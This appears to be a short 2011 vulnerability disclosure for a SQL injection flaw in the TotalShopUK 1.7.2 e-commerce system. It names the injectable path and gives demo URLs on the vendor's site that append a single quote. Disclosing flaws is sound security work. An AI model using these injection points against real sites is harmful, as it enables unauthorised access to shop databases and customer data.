TotalShopUK version 1.7.2 suffers from a remote SQL injection vulnerability.
bf93d69ca9557818c6db657e70f42d62430acb2c031b9601dc0fbc9ba3674a9f
# Exploit Title: TotalShopUK (E-Commerce System) SQL Injection
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: http://www.totalshopuk.com
# Version: 1.7.2
# Tested on: All versions are Vulnerability
ISSUE
SQL Injection can be done using the command input
Exploit:
products/c/index.php/1'
Demo:
http://www.totalshopuk.com/products/c/index.php/1'
http://www.totalshopuk.com/products/c/laptops/1'
Thanks,
Eyüp CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr